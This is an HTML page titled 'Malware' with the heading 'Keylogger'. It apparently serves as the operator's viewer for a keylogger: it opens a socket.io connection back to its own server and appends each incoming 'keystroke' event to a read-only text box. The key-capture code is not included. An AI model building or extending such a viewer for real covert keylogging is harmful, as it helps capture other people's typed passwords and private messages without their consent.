<!DOCTYPE html>
<html>
<head>
    <title>Malware</title>
    <script src="https://cdn.socket.io/4.4.1/socket.io.min.js"></script>
    <script>
        var socket = io.connect('http://' + document.domain + ':' + location.port);

        socket.on('keystroke', function(data) {
            var keystrokeDisplay = document.getElementById('keystroke-display');
            keystrokeDisplay.value += data.key;
        });
    </script>
    <style>
        body {
            font-family: Arial, sans-serif;
            background-color: #f0f0f0;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
        }

        .container {
            background-color: #ffffff;
            padding: 30px;
            border-radius: 5px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
            text-align: center;
        }

        h1 {
            color: #333333;
            margin-bottom: 20px;
        }

        #keystroke-display {
            width: 100%;
            height: 200px;
            padding: 0px;
            font-size: 16px;
            border: 1px solid #cccccc;
            border-radius: 3px;
            resize: none;
            background-color: #f9f9f9;
        }
    </style>
</head>
<body>
    <div class="container">
        <h1>Keylogger</h1>
        <textarea id="keystroke-display" rows="10" cols="50" readonly></textarea>
    </div>
</body>
</html>